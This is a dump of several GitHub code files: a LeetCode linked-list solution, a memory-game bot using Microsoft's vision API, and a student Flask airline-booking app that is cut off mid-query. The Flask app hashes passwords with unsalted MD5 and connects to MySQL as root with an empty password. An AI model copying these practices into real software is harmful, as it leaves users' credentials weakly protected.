font_thickness=3, text_color=(255,0,0), text_color_bg=(255,255,255))\n","repo_name":"Y2Nk4/LiDAR_Obstacle_Detection","sub_path":"drivers/ComputingUnit.py","file_name":"ComputingUnit.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"31177353992","text":"class Solution:\n def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n count = 1\n curr = head\n\n if left == right:\n return head\n\n else:\n while count < left:\n count += 1\n curr = curr.next\n\n while count < right:\n swap = curr\n for _ in range(right-count):\n swap = swap.next\n curr.val, swap.val = swap.val, curr.val\n curr = curr.next\n count += 1\n right -= 1\n\n return head\n","repo_name":"sirutBuasai/leetcode","sub_path":"medium/reverse-linked-list-ii.py","file_name":"reverse-linked-list-ii.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13241666011","text":"# . __ __ _ _ ____\n# | \\/ | __ _| |_ ___| |__ / ___| __ _ _ __ ___ ___\n# | |\\/| |/ _` | __/ __| '_ \\ | | _ / _` | '_ ` _ \\ / _ \\\n# | | | | (_| | || (__| | | | | |_| | (_| | | | | | | __/\n# |_| |_|\\__,_|\\__\\___|_| |_| \\____|\\__,_|_| |_| |_|\\___|\n\n\n# Estrategia \"blastoise\"\n\nbotName = \"baltazarortg-1\"\nimport requests\nimport json\nfrom random import sample, choice\nfrom time import sleep\n\n\nheaders_vision = {\n \"Ocp-Apim-Subscription-Key\": \"\",\n \"Content-Type\": \"application/octet-stream\",\n}\nvision_base_url = \"https://westeurope.api.cognitive.microsoft.com/vision/v2.0/\"\n\n# array con diccionarios que tienen keys: Index, State (ANALYSED, UNANALYSED, MATCHED), Subject y Category\nanalysed_tiles = []\n\nprevious_move = []\napi_calls = []\nmove_number = 0\nbonus_category = \"\"\nmatches_antes_fin_analisis = 0\n\n\ndef calculate_move(gamestate):\n global analysed_tiles\n global previous_move\n global move_number\n global bonus_category\n global matches_antes_fin_analisis\n\n # Variables del estado\n num_tiles = len(gamestate[\"Board\"])\n bonus_category = gamestate[\"Bonus\"].upper()\n\n if move_number == 0:\n categories_of_tiles = get_tiles_categories_from_backs(gamestate)\n print(\"Categories of tiles: {}\".format(categories_of_tiles))\n\n move_number += 1\n\n if gamestate[\"UpturnedTiles\"] == []:\n # No tendremos UpturnedTiles al comienzo del juego y cuando ultimo movimiento fue un match.\n print(\"{}. No upturned tiles for this move.\".format(move_number))\n else:\n # Mostrar los UpturnedTiles\n print(\n \"{}. 
({}, {}) Upturned tiles for this move\".format(\n move_number,\n gamestate[\"UpturnedTiles\"][0][\"Index\"],\n gamestate[\"UpturnedTiles\"][1][\"Index\"],\n )\n )\n print(\" gamestate: {}\".format(gamestate))\n\n # Primer turno del juego\n if analysed_tiles == []:\n for index in range(num_tiles):\n # Mark tile as not analysed\n analysed_tiles.append({})\n analysed_tiles[index][\"Index\"] = index\n analysed_tiles[index][\"State\"] = \"UNANALYSED\"\n analysed_tiles[index][\"Category\"] = categories_of_tiles[index]\n analysed_tiles[index][\"Subject\"] = None\n\n # Si tenemos UpturnedTiles\n if gamestate[\"UpturnedTiles\"] != []:\n # Aqui se esta actualizando el array de analysed_tiles\n analyse_tiles(gamestate[\"UpturnedTiles\"], gamestate)\n else:\n # No es nuestro primer move en el juego\n if previous_move != []:\n print(\n \" MATCH: ({}, {}) - {}\".format(\n previous_move[0],\n previous_move[1],\n analysed_tiles[previous_move[0]][\"Subject\"],\n )\n )\n analysed_tiles[previous_move[0]][\"State\"] = \"MATCHED\"\n analysed_tiles[previous_move[1]][\"State\"] = \"MATCHED\"\n\n # Primer movimiento\n if move_number == 1:\n unanalysed_tiles = get_unanalysed_tiles()\n print(\n \"Len de unanalysed_tiles. Deberia ser n - 2. {}\".format(\n len(unanalysed_tiles)\n )\n )\n tile_a, tile_b = search_tiles_same_category(unanalysed_tiles, bonus_category)\n move = [tile_a, tile_b]\n matches_antes_fin_analisis += 1\n print(\" Primer movimiento: {}\".format(move))\n elif move_number <= len(gamestate[\"Board\"]) / 2:\n # Mientras esto sea verdad, continuamos explorando\n unanalysed_tiles = get_unanalysed_tiles()\n print(\n \"Len de unanalysed_tiles. Deberia reducirse por 2 cada vez {}\".format(\n len(unanalysed_tiles)\n )\n )\n\n if search_tiles_same_category(unanalysed_tiles, bonus_category):\n # Afortunado. Puedo investigar y ademas tener la probabilidad de hacer match\n tile_a, tile_b = search_tiles_same_category(\n unanalysed_tiles, bonus_category\n )\n move = [tile_a, tile_b]\n matches_antes_fin_analisis += 1\n print(\"Match categorico encontrado. {}\".format(move))\n else:\n # Ni modo, pero puedo seguir investigando\n print(\"Seguimos investigando\")\n tile_a, tile_b = unanalysed_tiles[0], unanalysed_tiles[1]\n move = [tile_a, tile_b]\n print(\"Nuevo move. 
{}\".format(move))\n else:\n # Ya podemos comenzar a hacer matches\n print(\n \"Matches encontrados durante el analisis: {}\".format(\n matches_antes_fin_analisis\n )\n )\n unanalysed_tiles = get_unanalysed_tiles()\n\n match = search_for_matching_titles_bonus()\n if match is not None:\n print(\" Matching Move: {}\".format(match))\n move = match\n else:\n match = search_for_matching_tiles()\n # If SI tenemos un match\n if match is not None:\n\n print(\" Matching Move: {}\".format(match))\n move = match\n # La actualizacion a MATCHED ocurre en el proximo turno cuando UpturnedTiles == [] y el previous_move != []\n\n else:\n unanalysed_tiles = get_unanalysed_tiles()\n if unanalysed_tiles != []:\n\n move = sample(unanalysed_tiles, 2)\n else:\n\n unmatched_tiles = get_unmatched_tiles()\n\n move = sample(unmatched_tiles, 2)\n\n previous_move = move\n return {\"Tiles\": move}\n\n\ndef search_for_matching_tiles():\n for index_1, tile_1 in enumerate(analysed_tiles):\n for index_2, tile_2 in enumerate(analysed_tiles):\n if (\n tile_1[\"State\"] == tile_2[\"State\"] == \"ANALYSED\"\n and tile_1[\"Subject\"] == tile_2[\"Subject\"]\n and tile_1[\"Subject\"] is not None\n and index_1 != index_2\n ):\n return [index_1, index_2]\n return None\n\n\ndef search_for_matching_titles_bonus():\n for index_1, tile_1 in enumerate(analysed_tiles):\n for index_2, tile_2 in enumerate(analysed_tiles):\n if (\n tile_1[\"State\"] == tile_2[\"State\"] == \"ANALYSED\"\n and tile_1[\"Subject\"] == tile_2[\"Subject\"]\n and tile_1[\"Subject\"] is not None\n and tile_1[\"Category\"] == tile_2[\"Category\"] == bonus_category\n and index_1 != index_2\n ):\n return [index_1, index_2]\n return None\n\n\ndef search_tiles_same_category(tiles_indeces, category):\n tiles_to_search = []\n\n for idx in tiles_indeces:\n tile_to_add = analysed_tiles[idx]\n tile_to_add[\"original_idx\"] = analysed_tiles[idx][\"Index\"]\n tiles_to_search.append(tile_to_add)\n\n for index_1, tile_1 in enumerate(tiles_to_search):\n for index_2, tile_2 in enumerate(tiles_to_search):\n if (\n tile_1[\"Category\"] == tile_2[\"Category\"] == category\n and tile_1[\"Category\"] is not None\n and tile_1[\"original_idx\"] != tile_2[\"original_idx\"]\n ):\n\n return [tile_1[\"original_idx\"], tile_2[\"original_idx\"]]\n # print(\"NO se encontro match categorico\")\n return None\n\n\n# Son los no analizados (obviamente) y los ya analizados, que no tienen match\ndef get_unmatched_tiles():\n unmatched_tiles = []\n # For every tile in the game\n for index, tile in enumerate(analysed_tiles):\n if tile[\"State\"] != \"MATCHED\":\n unmatched_tiles.append(index)\n return unmatched_tiles\n\n\ndef get_unanalysed_tiles():\n unanalysed_tiles = []\n for index, tile in enumerate(analysed_tiles):\n if tile[\"State\"] == \"UNANALYSED\":\n unanalysed_tiles.append(index)\n return unanalysed_tiles\n\n\n# Va a analizar de dos en dos\ndef analyse_tiles(tiles, gamestate):\n for tile in tiles:\n analyse_tile(tile, gamestate)\n\n\n# Determina la categoria\ndef analyse_tile(tile, gamestate):\n if analysed_tiles[tile[\"Index\"]][\"State\"] != \"UNANALYSED\":\n return\n\n # Call analysis\n analyse_url = vision_base_url + \"analyze\" # Use analyze API function\n # List of the features that we want to get\n params_analyse = {\n \"visualFeatures\": \"categories,tags,description,faces,imageType,color\",\n \"details\": \"celebrities,landmarks\",\n }\n data = {\"url\": tile[\"Tile\"]}\n msapi_response = microsoft_api_call(\n analyse_url, params_analyse, headers_vision, data\n )\n print(\" API 
Result tile #{}: {}\".format(tile[\"Index\"], msapi_response))\n\n subject = check_for_landmark(msapi_response)\n\n if subject is None:\n subject = check_for_animal(msapi_response, gamestate[\"AnimalList\"])\n if subject is None:\n subject = check_for_text(tile)\n else:\n print(\" Animal at tile #{}: {}\".format(tile[\"Index\"], subject))\n analysed_tiles[tile[\"Index\"]][\"State\"] = \"ANALYSED\"\n analysed_tiles[tile[\"Index\"]][\"Subject\"] = subject\n\n\ndef check_for_animal(msapi_response, animal_list):\n subject = None\n if \"tags\" in msapi_response:\n for tag in sorted(\n msapi_response[\"tags\"], key=lambda x: x[\"confidence\"], reverse=True\n ):\n if \"name\" in tag and tag[\"name\"] in animal_list:\n subject = tag[\"name\"].lower()\n print(\" Animal: {}\".format(subject))\n break\n # Return the subject\n return subject\n\n\ndef check_for_text(tile):\n subject = None\n\n # Call analysis\n analyse_url = vision_base_url + \"ocr\" # Use OCR API function\n params_analyse = {}\n data = {\"url\": tile[\"Tile\"]}\n msapi_response = microsoft_api_call(\n analyse_url, params_analyse, headers_vision, data\n )\n\n print(\"OCR Response: {}\".format(msapi_response))\n\n if \"regions\" in msapi_response: # Checando si el dict tiene ese key\n if msapi_response[\"regions\"]:\n if \"lines\" in msapi_response[\"regions\"][0]:\n if \"words\" in msapi_response[\"regions\"][0][\"lines\"][0]:\n if \"text\" in msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0]:\n subject = msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0][\n \"text\"\n ]\n print(\"***OCR text: {}\".format(subject))\n\n return subject\n\n\ndef get_tiles_categories_from_backs(gamestate):\n # Lista con strings\n categories_of_tiles = []\n\n # Call analysis\n analyse_url = vision_base_url + \"ocr\" # Use OCR API function\n params_analyse = {}\n\n for tile in gamestate[\"TileBacks\"]:\n category = \"\"\n data = {\"url\": tile}\n msapi_response = microsoft_api_call(\n analyse_url, params_analyse, headers_vision, data\n )\n if \"regions\" in msapi_response: # Checando si el dict tiene ese key\n if msapi_response[\"regions\"]:\n if \"lines\" in msapi_response[\"regions\"][0]:\n if \"words\" in msapi_response[\"regions\"][0][\"lines\"][0]:\n if (\n \"text\"\n in msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0]\n ):\n category = (\n msapi_response[\"regions\"][0][\"lines\"][0][\"words\"][0][\n \"text\"\n ]\n + \"S\"\n )\n categories_of_tiles.append(category)\n print(\"***OCR Categoria en back: {}\".format(category))\n return categories_of_tiles\n\n\ndef check_for_landmark(msapi_response):\n\n subject = None\n\n for category in msapi_response[\"categories\"]:\n\n if (\n \"detail\" in category\n and \"landmarks\" in category[\"detail\"]\n and category[\"detail\"][\"landmarks\"]\n ):\n\n subject = category[\"detail\"][\"landmarks\"][0][\"name\"].lower()\n\n print(\"Landmark: {}\".format(subject))\n break\n\n return subject\n\n\n# Call the Microsoft API to analyse the image and to return information\n# about the contents of the image.\n#\n# Inputs:\n# url: string - The Microsoft API endpoint\n# params: dictionary - Which Computer Vision services should the request check for\n# headers: dictionary - API Key to allow request to be made\n# data: dictionary - The image that we want the API to analyse\n# Outputs:\n# JSON dictionary - The result of the API call\n#\ndef microsoft_api_call(url, params, headers, data):\n retry_count = 0\n res = {}\n\n while (\"error\" in res and res[\"error\"][\"code\"] == \"429\") or res == {}:\n 
# Make API request and record the results\n try:\n r = requests.get(data[\"url\"], allow_redirects=True)\n response = requests.post(\n url, headers=headers_vision, params=params, data=r.content\n )\n res = response.json() # Convert result to JSON\n except Exception as e:\n retry_count += 1\n # print(f\" [WARN] ({retry_count}) There was an issue making the Microsoft API request, retrying...\")\n # print(f\" {e}\")\n\n return res\n\n\n# Test the user has used a valid subscription key\ndef valid_subscription_key():\n # Make a computer vision api call\n params_analyse = {\"visualFeatures\": \"categories,tags\", \"details\": \"landmarks\"}\n data = {\"url\": \"https://www.aigaming.com/Images/aiWebsiteLogo.png\"}\n\n test_api_call = microsoft_api_call(\n vision_base_url + \"analyze\", params_analyse, headers_vision, data\n )\n\n if \"error\" in test_api_call:\n raise ValueError(\n \"Invalid Microsoft Computer Vision API key for current region: {}\".format(\n test_api_call\n )\n )\n\n\n# Check the subscription key\nvalid_subscription_key()\n","repo_name":"Baltazar-Ortega/bot_podio","sub_path":"blastoise.py","file_name":"blastoise.py","file_ext":"py","file_size_in_byte":13917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"7655275696","text":"#Import Flask Library\r\nfrom flask import Flask, render_template, request, session, url_for, redirect, Markup\r\nimport pymysql.cursors\r\nfrom datetime import datetime\r\nimport random\r\n#Initialize the app from Flask\r\napp = Flask(__name__)\r\n\r\n#Configure MySQL\r\nconn = pymysql.connect(host='localhost',\r\n user='root',\r\n password='',\r\n db='project_1',\r\n charset='utf8mb4',\r\n cursorclass=pymysql.cursors.DictCursor)\r\n\r\n#Define a route to hello function\r\n@app.route('/')\r\ndef hello():\r\n try:\r\n session['customer'] != None\r\n except KeyError:\r\n try:\r\n session['staff'] != None\r\n except KeyError:\r\n return render_template('index.html')\r\n else:\r\n return redirect(url_for('staff_home'))\r\n else:\r\n return redirect(url_for('customerHome'))\r\n # session['customer'] != None:\r\n # return redirect(url_for('customerHome'))\r\n # elif session['staff'] != None:\r\n # return redirect(url_for('staff_home'))\r\n # else:\r\n # return render_template('index.html')\r\n\r\n@app.route('/public_info')\r\ndef publicInfo():\r\n return render_template('public_info.html')\r\n\r\n@app.route('/flight_search')\r\ndef flightSearch():\r\n return render_template('flight_search.html')\r\n\r\n@app.route('/flightStatusAction', methods = ['POST'])\r\ndef flightStatusAction():\r\n dept_city_airport = request.form['dept_city']\r\n dept_date = request.form['dept_date']\r\n airline = request.form['airline']\r\n flight_no = request.form['flight_no']\r\n cursor = conn.cursor()\r\n query = '''SELECT flight_no, airline, dep_datetime, status\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (dep_airport = %s OR a1.city = %s)\r\n AND flight_no = %s\r\n AND DATE(dep_datetime) = %s\r\n AND airline = %s;'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, flight_no, dept_date, airline))\r\n data = cursor.fetchone()\r\n cursor.close()\r\n if data:\r\n return render_template('flight_status.html', message = data)\r\n else:\r\n error = 'flight not found, please search again'\r\n return render_template('flight_status.html', error = error)\r\n\r\n\r\n@app.route('/flightSearchAction', methods = 
['POST'])\r\ndef flightSearchAction():\r\n dept_city_airport = request.form['dept_city']\r\n dest_city_airport = request.form['dest_city']\r\n dept_date = request.form['dept_date']\r\n ret_date = request.form['ret_date']\r\n cursor = conn.cursor()\r\n if ret_date == '':\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s;'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date))\r\n else:\r\n query = '''SELECT flight_no, airline, dep_datetime, arr_datetime,\r\n dep_airport, arr_airport, a1.city AS dep_city, a2.city AS arr_city\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s) OR ((dep_airport = %s OR a1.city = %s) AND (arr_airport = %s OR a2.city = %s)\r\n AND DATE(dep_datetime) = %s);'''\r\n cursor.execute(query, (dept_city_airport, dept_city_airport, dest_city_airport, dest_city_airport, dept_date, dest_city_airport, dest_city_airport, dept_city_airport, dept_city_airport, ret_date))\r\n data = cursor.fetchall()\r\n cursor.close()\r\n if data:\r\n return render_template('flight_search.html', message = data)\r\n else:\r\n error = 'no flight available, please search again'\r\n return render_template('flight_search.html', error = error)\r\n\r\n\r\n@app.route('/flight_status')\r\ndef flightStatus():\r\n return render_template('flight_status.html')\r\n#Define route for login\r\n@app.route('/customer_login')\r\ndef loginCustomer():\r\n\treturn render_template('customer_login.html')\r\n#Define route for login\r\n@app.route('/staff_login')\r\ndef loginStaff():\r\n\treturn render_template('staff_login.html')\r\n#Define route for customer register\r\n@app.route('/customer_register')\r\ndef registerCustomer():\r\n\treturn render_template('customer_register.html')\r\n#Define route for staff register\r\n@app.route('/staff_register')\r\ndef registerStaff():\r\n\treturn render_template('staff_register.html')\r\n#Authenticates the login\r\n@app.route('/loginAuthCustomer', methods=['GET', 'POST'])\r\ndef loginAuthCustomer():\r\n\t#grabs information from the forms\r\n\tusername = request.form['username']\r\n\tpassword = request.form['password']\r\n\r\n\t#cursor used to send queries\r\n\tcursor = conn.cursor()\r\n\t#executes query\r\n\tquery = 'SELECT * FROM customer WHERE email = %s and password = MD5(%s)'\r\n\tcursor.execute(query, (username, password))\r\n\t#stores the results in a variable\r\n\tdata = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n\tcursor.close()\r\n\terror = None\r\n\tif(data):\r\n\t\t#creates a session for the the user\r\n\t\t#session is a built in\r\n\t\tsession['customer'] = data\r\n\t\treturn redirect(url_for('customerHome'))\r\n\telse:\r\n\t\t#returns an error message to the html page\r\n\t\terror = 'Invalid login or username'\r\n\t\treturn render_template('customer_login.html', error=error)\r\n#Authenticates the login\r\n@app.route('/loginAuthStaff', methods=['GET', 'POST'])\r\ndef loginAuthStaff():\r\n\t#grabs information from the forms\r\n\tusername = 
request.form['username']\r\n\tpassword = request.form['password']\r\n\r\n\t#cursor used to send queries\r\n\tcursor = conn.cursor()\r\n\t#executes query\r\n\tquery = 'SELECT * FROM airline_staff WHERE user_name = %s and password = MD5(%s)'\r\n\tcursor.execute(query, (username, password))\r\n\t#stores the results in a variable\r\n\tdata = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n\tcursor.close()\r\n\terror = None\r\n\tif(data):\r\n\t\t#creates a session for the the user\r\n\t\t#session is a built in\r\n\t\tsession['staff'] = data\r\n\t\treturn redirect(url_for('staff_home'))\r\n\telse:\r\n\t\t#returns an error message to the html page\r\n\t\terror = 'Invalid login or username'\r\n\t\treturn render_template('staff_login.html', error=error)\r\n#Authenticates the register for customer\r\n@app.route('/registerAuthCustomer', methods=['GET', 'POST'])\r\ndef registerAuthCustomer():\r\n\t#grabs information from the forms\r\n email = request.form['email']\r\n password = request.form['password']\r\n name = request.form['name']\r\n phone_no = request.form['phone_no']\r\n date_of_birth = request.form['date_of_birth']\r\n passport_no = request.form['passport_no']\r\n passport_exp = request.form['passport_exp']\r\n passport_country = request.form['passport_country']\r\n state = request.form['state']\r\n city = request.form['city']\r\n street = request.form['street']\r\n building_no = request.form['building_no']\r\n\t#cursor used to send queries\r\n cursor = conn.cursor()\r\n\t#executes query\r\n query = 'SELECT * FROM customer WHERE email = %s'\r\n cursor.execute(query, (email))\r\n\t#stores the results in a variable\r\n data = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n error = None\r\n if(data):\r\n\t\t#If the previous query returns data, then user exists\r\n\t error = \"This user already exists\"\r\n\t return render_template('customer_register.html', error = error)\r\n else:\r\n\t ins = 'INSERT INTO customer VALUES(%s, MD5(%s), %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\r\n\t cursor.execute(ins, (email, password, name, phone_no, date_of_birth, passport_no, passport_exp, passport_country, state, city, street, building_no))\r\n\t conn.commit()\r\n\t cursor.close()\r\n\t return render_template('index.html')\r\n@app.route('/registerAuthStaff', methods=['GET', 'POST'])\r\n# staff register\r\ndef registerAuthStaff():\r\n\t#grabs information from the forms\r\n user_name = request.form['username']\r\n password = request.form['password']\r\n first_name = request.form['first_name']\r\n last_name = request.form['last_name']\r\n date_of_birth = request.form['date_of_birth']\r\n airline = request.form['airline']\r\n\t#cursor used to send queries\r\n cursor = conn.cursor()\r\n\t#executes query\r\n query = 'SELECT * FROM airline_staff WHERE user_name = %s'\r\n cursor.execute(query, (user_name))\r\n\t#stores the results in a variable\r\n data = cursor.fetchone()\r\n\t#use fetchall() if you are expecting more than 1 data row\r\n error = None\r\n if(data):\r\n\t\t#If the previous query returns data, then user exists\r\n error = \"This user already exists\"\r\n return render_template('staff_register.html', error = error)\r\n else:\r\n ins = 'INSERT INTO airline_staff VALUES(%s, MD5(%s), %s, %s, %s, %s)'\r\n cursor.execute(ins, (user_name, password, first_name, last_name, date_of_birth, airline))\r\n conn.commit()\r\n cursor.close()\r\n return render_template('index.html')\r\n\r\n@app.route('/view_flights')\r\ndef view_flights():\r\n return 
render_template('view_flights.html')\r\n\r\n@app.route('/viewFlightsAction', methods=['GET', 'POST'])\r\ndef viewFlightsAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n start_date = request.form['start_date']\r\n end_date = request.form['end_date']\r\n dep_city = request.form['dept_city']\r\n dest_city = request.form['dest_city']\r\n cursor = conn.cursor();\r\n query = '''SELECT flight.flight_no as flight_no,\r\n flight.dep_datetime as dep_datetime,\r\n arr_datetime, base_price, seat_sold, dep_airport, arr_airport\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n INNER JOIN airport a2 on flight.arr_airport = a2.name\r\n WHERE (airline = %s)\r\n AND (DATE(dep_datetime) >= %s)\r\n AND (DATE(dep_datetime) <= %s)\r\n AND (flight.dep_airport LIKE %s OR a1.city LIKE %s)\r\n AND (flight.arr_airport LIKE %s OR a2.city LIKE %s)'''\r\n if start_date == '':\r\n start_date = 'dep_datetime'\r\n if end_date == '':\r\n end_date = 'dep_datetime'\r\n if dep_city == '':\r\n dep_city = '%'\r\n if dest_city == '':\r\n dest_city = '%'\r\n print(dep_city)\r\n cursor.execute(query, (airline, start_date, end_date, dep_city, dep_city, dest_city, dest_city))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n print(message)\r\n if message:\r\n return render_template('view_flights.html', message = message)\r\n else:\r\n return render_template('view_flights.html', error = 'no flights found based on your conditions!')\r\n\r\n@app.route('/view_pass')\r\ndef view_pass():\r\n return render_template('view_pass.html')\r\n\r\n@app.route('/viewPassAction', methods=['GET', 'POST'])\r\ndef viewPassAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n dept_city = request.form['dept_city']\r\n flight_no = request.form['flight_no']\r\n dept_date = request.form['dept_date']\r\n cursor = conn.cursor();\r\n query = '''SELECT take.email as email, customer.name as name\r\n FROM flight\r\n INNER JOIN airport a1 on flight.dep_airport = a1.name\r\n NATURAL JOIN take\r\n INNER JOIN customer on customer.email = take.email\r\n WHERE (airline = %s)\r\n AND (DATE(dep_datetime) = %s)\r\n AND (flight.flight_no = %s)\r\n AND (dep_airport = %s OR a1.city = %s)'''\r\n cursor.execute(query, (airline, dept_date, flight_no, dept_city, dept_city))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n print(message)\r\n if message:\r\n return render_template('view_pass.html',message = message)\r\n else:\r\n return render_template('view_pass.html',error = 'no passenger found on said flight')\r\n\r\n@app.route('/create_flight')\r\ndef create_flight():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff 
WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT * FROM flight\r\n WHERE (airline = %s)\r\n AND (dep_datetime BETWEEN NOW() AND DATE_ADD(NOW(), INTERVAL 30 DAY));'''\r\n cursor.execute(query, (airline))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('create_flight.html', message = message)\r\n@app.route('/createFlightAction', methods=['POST'])\r\ndef createFlightAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n flight_no = request.form['flight_no']\r\n dep_datetime = request.form['dep_datetime']\r\n arr_datetime = request.form['arr_datetime']\r\n status = request.form['status']\r\n base_price = request.form['base_price']\r\n seat_sold = request.form['seat_sold']\r\n dept_airport = request.form['dept_airport']\r\n arr_airport = request.form['arr_airport']\r\n airplane_id = request.form['airplane_id']\r\n cursor = conn.cursor();\r\n query = '''INSERT INTO `flight` (`flight_no`, `airline`, `dep_datetime`,\r\n `arr_datetime`, `status`, `base_price`, `seat_sold`, `dep_airport`, `arr_airport`, `airplane_id`)\r\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);'''\r\n try:\r\n cursor.execute(query, (flight_no, airline, dep_datetime, arr_datetime,\r\n status, base_price, seat_sold, dept_airport, arr_airport, airplane_id))\r\n conn.commit()\r\n except pymysql.Error:\r\n render_template('create_flight.html', error = 'flight already exists!')\r\n cursor.close()\r\n return redirect(url_for('create_flight'))\r\n\r\n@app.route('/change_status')\r\ndef change_status():\r\n return render_template('change_status.html')\r\n\r\n@app.route('/changeStatusAction', methods=['POST'])\r\ndef changeStatusAction():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n flight_no = request.form['flight_no']\r\n dep_date = request.form['dept_date']\r\n dept_airport = request.form['dept_airport']\r\n status = request.form['status']\r\n cursor = conn.cursor();\r\n query = '''UPDATE flight\r\n SET status = %s\r\n WHERE (airline = %s) AND (flight_no = %s) AND (DATE(dep_datetime) = %s) AND (dep_airport = %s)'''\r\n try:\r\n cursor.execute(query, (status, airline, flight_no, dep_date, dept_airport))\r\n conn.commit()\r\n except pymysql.Error:\r\n render_template('change_status.html', error = 'Flight Not Found!')\r\n cursor.close()\r\n return render_template('change_status.html', error = 'Status Changed!')\r\n\r\n@app.route('/add_airplane')\r\ndef add_airplane():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return 
redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT * FROM airplane\r\n WHERE (airline = %s);'''\r\n cursor.execute(query, (airline))\r\n message = cursor.fetchall()\r\n cursor.close()\r\n return render_template('add_airplane.html', message = message)\r\n@app.route('/addAirplane', methods=['POST'])\r\ndef addAirplane():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n airplane_id = request.form['airplane_id']\r\n capacity = request.form['capacity']\r\n cursor = conn.cursor();\r\n query = '''INSERT INTO `airplane` (`airplane_id`, `airline`, `capacity`)\r\n VALUES (%s, %s, %s);'''\r\n try:\r\n cursor.execute(query, (airplane_id, airline, capacity))\r\n conn.commit()\r\n except pymysql.IntegrityError:\r\n return render_template('add_airplane.html', error = 'plane ID already exists!')\r\n cursor.close()\r\n return redirect(url_for('add_airplane'))\r\n\r\n@app.route('/add_airport')\r\ndef add_airport():\r\n cursor = conn.cursor();\r\n try:\r\n user_name = session['staff']['user_name']\r\n except KeyError:\r\n return redirect(url_for('action_unauthorized'))\r\n query = '''SELECT airline FROM airline_staff WHERE user_name = %s;'''\r\n cursor.execute(query, (user_name))\r\n airline = cursor.fetchone()\r\n cursor.close()\r\n if airline == None:\r\n return redirect(url_for('action_unauthorized'))\r\n airline = airline['airline']\r\n cursor = conn.cursor();\r\n query = '''SELECT * FROM 